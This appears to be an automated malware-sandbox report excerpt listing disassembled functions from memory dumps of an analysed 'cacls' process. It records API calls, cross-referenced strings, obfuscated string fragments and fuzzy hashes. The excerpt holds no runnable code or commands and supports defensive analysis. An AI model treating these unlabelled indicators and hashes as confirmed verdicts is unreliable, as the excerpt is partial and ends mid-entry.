Instruction Fuzzy Hash: D9012073A0501C7BDB155AD8AC91EFEB3ACDF56755B04819AF908EB700D6264D028BE2

Function 02DB3930 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02DB39FD

Strings

wininet.dll, xrefs: 02DB399B, 02DB39A7
net.dll, xrefs: 02DB39C4, 02DB3A48, 02DB3A28, 02DB3A34, 02DB3A54

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 7e391887d390e6fb8dc0af114afc1bda0615f9d98e64d5305ba17bffebcf6a4a
Instruction ID: 33bd48adaa049e480a4aad9710ac3eb2177b2af2f8423080f5e8f629ab431a3f
Opcode Fuzzy Hash: 7e391887d390e6fb8dc0af114afc1bda0615f9d98e64d5305ba17bffebcf6a4a
Instruction Fuzzy Hash: 9F319D71A04605AFC715DFA4CC80FEBBBB9EF45704F10855DE91A6B280D370AA00CFA0

Function 02DAF3C9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 02DAF3E7
CoUninitialize.COMBASE ref: 02DAF4CE

Strings

@J7<, xrefs: 02DAF3FB

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 09de8896824e1eee1502f1a47a321a5de30e5dfc714a7738b16c955751c5a71d
Instruction ID: 1dff2afbc1376ae9d1bf9594b3956bf40453a052f82dc320497a82278093128c
Opcode Fuzzy Hash: 09de8896824e1eee1502f1a47a321a5de30e5dfc714a7738b16c955751c5a71d
Instruction Fuzzy Hash: 27312EB5A0060A9FDB00DF98C8809EEB7B9BF88304B108599E905AB354D775AE45CBA0

Function 02DAF3D0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 02DAF3E7
CoUninitialize.COMBASE ref: 02DAF4CE

Strings

@J7<, xrefs: 02DAF3FB

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 4665c0bb83f05e6e3eba5f66f864196b121dfece7d89527683840bd33fdf79f1
Instruction ID: 13fe3e0515528bd2d9b6d8dcf948ccb24992f263a5f2c22264483db0389fc0fd
Opcode Fuzzy Hash: 4665c0bb83f05e6e3eba5f66f864196b121dfece7d89527683840bd33fdf79f1
Instruction Fuzzy Hash: 743110B5A0060A9FDB00DFD8D890DEEB7B9FF88304B108559E915A7314D775EE45CBA0

Function 02DA8280 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02DA8269

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f003f3bd28303491e352295f67e58f2d1753434efecf21b63c1df168db83a3fb
Instruction ID: 39f166d8fb1c9f15e9ee47218ad1e4e67c5763420f889c58c6284a643589fd80
Opcode Fuzzy Hash: f003f3bd28303491e352295f67e58f2d1753434efecf21b63c1df168db83a3fb
Instruction Fuzzy Hash: 7511AF35508B446FEB14D528DCA1FB27798EB85718F488794EC95CB3E2D764BC12C261

Function 02DA4480 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02DA44F2

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 1842a29b06bf263a0b25cea29d729ed469f81cd4bde0f8ff751e792ff2b27482
Instruction ID: 91e27bd6b6d5516cf69496aeb2c1410a7431d3be22ee49c1a696848510ea2dd2
Opcode Fuzzy Hash: 1842a29b06bf263a0b25cea29d729ed469f81cd4bde0f8ff751e792ff2b27482
Instruction Fuzzy Hash: BB010CB5D0020DABDF10DAA4DC51FDDB7B9AF44308F0041A5A90997241F6B1EA14CBA1

Function 02DB9630 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,00000010,?,00000010,?,?,?,00000044,?,00000010,02DA81FE,?,?,?,?), ref: 02DB9690

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 280c9b52eb7d03c851bbe5e201913c1c2fbc1805ed23edf70ea996b175563717
Instruction ID: 7a8a0e4772b7d3122f27b5bf9ca27b8239b79b66cc2c1bb994f8e90092e8b445
Opcode Fuzzy Hash: 280c9b52eb7d03c851bbe5e201913c1c2fbc1805ed23edf70ea996b175563717
Instruction Fuzzy Hash: 0D019DB2210108BBCB54DE99DC84EEB77ADEF8D764F518208FA1DA7244D630FC518BA4

Function 02D99B70 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D99BB2

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 8433083d587771d5b52735d76af71d3d32c275d66503c3efc6b2bd896fb1cc7f
Instruction ID: 8a397e6132480acbba66b199575f0241b62fce3861b1128341a9df1f67864194
Opcode Fuzzy Hash: 8433083d587771d5b52735d76af71d3d32c275d66503c3efc6b2bd896fb1cc7f
Instruction Fuzzy Hash: 3AF0307325021436E72161A9AC02FD7669CDB85765F140426FA0DEB2C0D995B80146B4

Function 02D99B6B Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D99BB2

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4422fa201a4fcc443db7e35e4e4c1c95ff33f9add7b1b44ec41c203bf23bdc17
Instruction ID: 909fb06aac455d5cb14cd2f2e2ae4f9e3e70c8c855abf9e4a2d871405d27e968
Opcode Fuzzy Hash: 4422fa201a4fcc443db7e35e4e4c1c95ff33f9add7b1b44ec41c203bf23bdc17
Instruction Fuzzy Hash: 2AF065732902107AEB3165789D12FD7675DDF95751F150029F609EB2C0C995BC0146B4

Function 02DB8160 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(?,?,?), ref: 02DB81A0

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: Path$NameName_
String ID:
API String ID: 3514427675-0
Opcode ID: 9b515602749f35756ea061b258b3d3ca32c3fbd33832c84d8d5e9d542544643e
Instruction ID: 72c064a46e6eba00963d3d9a61198216cd554efc55b110b7eb304c09d5b31ab6
Opcode Fuzzy Hash: 9b515602749f35756ea061b258b3d3ca32c3fbd33832c84d8d5e9d542544643e
Instruction Fuzzy Hash: 39E039752002087BDA10EF59EC84EEB77ADEFCA750F404115F908A7240C661B9518BF0

Function 02DB95A0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B55E010,00000007,00000000,00000004,00000000,02DA3D02,000000F4), ref: 02DB95DC

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 03767bcb8ec4e7c17efe008e1e75fec207df61488d90a4e4baa00f8c890fa4c9
Instruction ID: e3b166269759b842f51c7f2f248e6296a71058c84a3e11024a51d7edf8a3772b
Opcode Fuzzy Hash: 03767bcb8ec4e7c17efe008e1e75fec207df61488d90a4e4baa00f8c890fa4c9
Instruction Fuzzy Hash: E3E065B2200208BBDA14EE68DC45FEB33ADEFCA750F004009FA1DA7241C670BD148AB9

Function 02DB9550 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02DA1999,?,02DB5927,02DA1999,02DB550F,02DB5927,?,02DA1999,02DB550F,00001000,?,?,00000000), ref: 02DB958C

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 957521d220d246f71628dfc5dd36653ef84af3141dd888ed7d6a79979164289e
Instruction ID: 4f4fe7a3e669e8b77b8bea1032c13e0a803ee55103cf56097d5cd72f1d3c5ba1
Opcode Fuzzy Hash: 957521d220d246f71628dfc5dd36653ef84af3141dd888ed7d6a79979164289e
Instruction Fuzzy Hash: DFE06572200208BBDA10EE59DC45FAB73ADEFC9714F004409F909A7240C670BD148AB4

Function 02DA8240 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02DA8269

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c60eb9d33efb856c87f2751aff12e26e4a96e3fa9d2d9eae0f2063bc9ecf7d85
Instruction ID: 85fe96a7a99eb181d923f79a829319bcaa0c055ba6e5c2dfe9cc66972cbcffc7
Opcode Fuzzy Hash: c60eb9d33efb856c87f2751aff12e26e4a96e3fa9d2d9eae0f2063bc9ecf7d85
Instruction Fuzzy Hash: 25E0DF316106086BEB1065A8AC91F7633489B48768F088650FD1DDB3D1E778FD028160

Function 02DA4531 Relevance: 1.5, APIs: 1, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02DA44F2

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 457ecf20fdd19a92ec5896355aeb07d11e6f81368d1ebf9cbe803f02fa824b0c
Instruction ID: ef3ec878eb54c9727d1b590a9adf21645d2b0de4a8ae7cfd444c069c12b73792
Opcode Fuzzy Hash: 457ecf20fdd19a92ec5896355aeb07d11e6f81368d1ebf9cbe803f02fa824b0c
Instruction Fuzzy Hash: 89E030B5D10109EBDF10DB94D851F9DB3A4EF44308F004295E90896341E671EA148B61

Function 02DA8239 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02DA8269

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e2213ae9a017ee24d57d83a02713cb1933e07fd3bdd89ab16eac353accbf6b31
Instruction ID: 70483bf4a40c1c272ab76282abdd11b72409f9454ba2f89d93bd4351d6d84e7c
Opcode Fuzzy Hash: e2213ae9a017ee24d57d83a02713cb1933e07fd3bdd89ab16eac353accbf6b31
Instruction Fuzzy Hash: 06E0DF356006086BEB1065A8DC91F763358AB48768F288210FD19EB3D6EB78FD0281A0

Function 02DA8030 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02DA1C80,02DB7E4F,02DB550F,02DA1C47), ref: 02DA8060

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: ea62886fee96d74f746347b11846217a7e7b7a6693e38470918c56d9c40ae5da
Instruction ID: 56c9baaffc1ab0a17ed10a6e940fd8ea81309e826f01e361311f6d1133cf1ee7
Opcode Fuzzy Hash: ea62886fee96d74f746347b11846217a7e7b7a6693e38470918c56d9c40ae5da
Instruction Fuzzy Hash: 8FD05E712943053FEA10A6A5DC13F56368D9B05798F084068BA0DEB3C2E996F9008575

Function 02DA8032 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02DA1C80,02DB7E4F,02DB550F,02DA1C47), ref: 02DA8060

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: dcf1f03e131e8fef7a4aee460c048aff228a60be432fbc018ddf2f84a4de3c6d
Instruction ID: fab68d22b11fc643e0fb0d341e64f6f00ee7da537c5dbd1538d35e503b42d546
Opcode Fuzzy Hash: dcf1f03e131e8fef7a4aee460c048aff228a60be432fbc018ddf2f84a4de3c6d
Instruction Fuzzy Hash: F8D0A7713D02013FFB10E6A4EC13F66264D9B55748F084068F90DEB3C1D996E9018534

Function 03742C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03742C24

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: be62c70b500c126e3b322d0b3b530adc5636310c5ea39eb0d5b2a04b59ad8415
Instruction ID: d4b1494c3f50edf8072899d94d9abdb1f3e9df3ab97d22ced179fe52e7155aa8
Opcode Fuzzy Hash: be62c70b500c126e3b322d0b3b530adc5636310c5ea39eb0d5b2a04b59ad8415
Instruction Fuzzy Hash: A6B09B71A015C5D6EB15E7604608717794467D0701F19C471F2030651F4779D1D1E576

Function 02DAF4DC Relevance: 1.5, APIs: 1, Instructions: 211COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 02DAF4CE

Memory Dump Source

Source File: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2d90000_cacls.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID:
API String ID: 3861434553-0
Opcode ID: 9e243be6618ff81d08473f25c0e07d035091fbaa854d8632babb28156920d935
Instruction ID: 8c17fa6c3e8caca03ec34218dd14768a2181cd79afa05d84534966d03c7af499
Opcode Fuzzy Hash: 9e243be6618ff81d08473f25c0e07d035091fbaa854d8632babb28156920d935
Instruction Fuzzy Hash: 75610171600306BEEB21AB64CC51FAA72ADEF05348F084256F5086B7C0DBB5BD51CBB9

Non-executed Functions

Function 03A204DE Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4653497597.0000000003A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3a20000_cacls.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbac8e4f89aeb14d8889aa717c0be23393a98c62e9e7ce7b2f31915a37dace82
Instruction ID: e03a6786d2f8d72b6ecf1bfad883e93eab0a72c6257420d258cff7f81c1cfa26
Opcode Fuzzy Hash: bbac8e4f89aeb14d8889aa717c0be23393a98c62e9e7ce7b2f31915a37dace82
Instruction Fuzzy Hash: 4041247061CB1D4FD368EF6C908167AF7E2FB89300F54462ED88AC7752EA74E8468385

Function 03A2DF91 Relevance: 57.7, Strings: 46, Instructions: 215COMMON

Download Yara Rule

Strings

@@@@, xrefs: 03A2E16F
!"#$, xrefs: 03A2E06C
?, xrefs: 03A2E180
)*+,, xrefs: 03A2E07A
@@@?, xrefs: 03A2E003
@@@@, xrefs: 03A2E129
@@@@, xrefs: 03A2E11B
@@@@, xrefs: 03A2E145
@@@@, xrefs: 03A2E0C0
@@@@, xrefs: 03A2E0F8
@@@@, xrefs: 03A2E0E3
@@@@, xrefs: 03A2E08F
@@@@, xrefs: 03A2E0B9
-./0, xrefs: 03A2E081
@@@@, xrefs: 03A2E0AB
123@, xrefs: 03A2E088
@@@@, xrefs: 03A2E153
@@@@, xrefs: 03A2E057
@@@@, xrefs: 03A2E01F
@@@@, xrefs: 03A2E168
@@@@, xrefs: 03A2E130
@@@@, xrefs: 03A2E137
%&'(, xrefs: 03A2E073
<=@@, xrefs: 03A2E018
@@@@, xrefs: 03A2E0B2
@@@@, xrefs: 03A2E114
@@@@, xrefs: 03A2E0D5
@@@@, xrefs: 03A2E161
@, xrefs: 03A2E026
@@@@, xrefs: 03A2E106
@@@@, xrefs: 03A2E0EA
@@@@, xrefs: 03A2E13E
@@@@, xrefs: 03A2E0A4
@@@@, xrefs: 03A2E0DC
@@@@, xrefs: 03A2E0F1
@@@@, xrefs: 03A2E15A
4567, xrefs: 03A2E00A
@@@@, xrefs: 03A2E10D
@@@@, xrefs: 03A2E122
@@@@, xrefs: 03A2E0C7
@@@@, xrefs: 03A2E0CE
@@@@, xrefs: 03A2E096
@@@@, xrefs: 03A2E09D
@@@@, xrefs: 03A2E14C
89:;, xrefs: 03A2E011
@@@@, xrefs: 03A2E0FF

Memory Dump Source

Source File: 0000000C.00000002.4653497597.0000000003A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3a20000_cacls.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3754132690
Opcode ID: 9ab9860024f0ec9feb98b133960ec13fe39492c21b087426098b2681c8066eb9
Instruction ID: f8b8549a613ac6d530e8b0f9fbdf158fdf4fed15218d2596022a67b31f1a1076
Opcode Fuzzy Hash: 9ab9860024f0ec9feb98b133960ec13fe39492c21b087426098b2681c8066eb9
Instruction Fuzzy Hash: 329162F04082948AC7158F58A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85

Function 03742890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0374293C
___swprintf_l.LIBCMT ref: 0374295E
___swprintf_l.LIBCMT ref: 037429A3
___swprintf_l.LIBCMT ref: 0377A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 0377A54E
ffff:, xrefs: 0377A504
::%hs%u.%u.%u.%u, xrefs: 0377A527
:%u.%u.%u.%u, xrefs: 0377A5B8

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 2d988a4122ad5a1f79dab55f1a9830327c38736b71cd42f9f40d94c2f1eb4c01
Instruction ID: 3cfcbc61a5092a5061299ad42e5af1abe4648fd013409eb0323813a0772941db
Opcode Fuzzy Hash: 2d988a4122ad5a1f79dab55f1a9830327c38736b71cd42f9f40d94c2f1eb4c01
Instruction Fuzzy Hash: 6451D7B6A00216BFDF10DF98C89097EFBBCBB092407148669F469D7642D774EE509BA0

Function 037B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 037B24A6
___swprintf_l.LIBCMT ref: 037B24E2
___swprintf_l.LIBCMT ref: 037B257D
___swprintf_l.LIBCMT ref: 037B25A3
___swprintf_l.LIBCMT ref: 037B25C8
___swprintf_l.LIBCMT ref: 037B2608

Strings

ffff:, xrefs: 037B247D, 037B249D
::ffff:0:%u.%u.%u.%u, xrefs: 037B24DA
:%u.%u.%u.%u, xrefs: 037B25FF
::%hs%u.%u.%u.%u, xrefs: 037B249E

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 488527d5aa3aa8d7db95bc61385635a95122c7816eac9cf46290519538d67574
Instruction ID: 802380a077914b1a36587bf9d0e7c8b5937f8e12580434b08a1b277c021c6144
Opcode Fuzzy Hash: 488527d5aa3aa8d7db95bc61385635a95122c7816eac9cf46290519538d67574
Instruction Fuzzy Hash: 9C51D6B5A01645AECB34DE5CC890ABFB7FDEF44200B148899E5E6D7642D7B4DE40C760

Function 03737630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03774725
Execute=1, xrefs: 03774713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03774655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03774742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 037746FC
ExecuteOptions, xrefs: 037746A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 03774787

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 3b62a98989d0d907a4d198d24afef5a26bc157d6bae6f40a39be8806940ea592
Instruction ID: 04a9ff06ff8a2a1c5793948e317b86817c701f4cda470196da8ed430400268af
Opcode Fuzzy Hash: 3b62a98989d0d907a4d198d24afef5a26bc157d6bae6f40a39be8806940ea592
Instruction Fuzzy Hash: 3F512AB5640359BADF14EBA5DC99FED73A8EF06300F0400EDD505AB192E770AA45DF50

Function 03A23B68 Relevance: 12.6, Strings: 10, Instructions: 62COMMON

Download Yara Rule

Strings

YE@J, xrefs: 03A23B93
NGLM, xrefs: 03A23C2D
YE@J, xrefs: 03A23C18
H]@F, xrefs: 03A23C1F
]LQ], xrefs: 03A23B79
AHGN, xrefs: 03A23C3B
^LKY, xrefs: 03A23BE7
H]@F, xrefs: 03A23B9A
HYYE, xrefs: 03A23BB6
@JH], xrefs: 03A23BBD

Memory Dump Source

Source File: 0000000C.00000002.4653497597.0000000003A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 03A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3a20000_cacls.jbxd

Similarity

API ID:
String ID: @JH]$AHGN$HYYE$H]@F$H]@F$NGLM$YE@J$YE@J$]LQ]$^LKY
API String ID: 0-1655944674
Opcode ID: 5ab2dd9ade9f0983eca4bbad90bbd7f4dfaf2448353273eef20483f5abfe329f
Instruction ID: bb33b0a773bca27c1c68eaa0a0c93884877ef95f44ad8502613c3abd10aed87a
Opcode Fuzzy Hash: 5ab2dd9ade9f0983eca4bbad90bbd7f4dfaf2448353273eef20483f5abfe329f
Instruction Fuzzy Hash: 2C3143B080425CEECF15CF84C1086EEBBB0FF06318F82906AE8296F241D7358659DB85

Function 037D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4650584763.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true

Associated: 0000000C.00000002.4650584763.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.4650584763.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_36d0000_cacls.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 01a5826be151c8bc2144f3f087fedb44f950e76931f691397088229e5c73c324
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: E302F375508341AFC709CF18C894A6BFBF5EFC8704F548A2DB9899B264DB31E905CB52

Function 0374B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

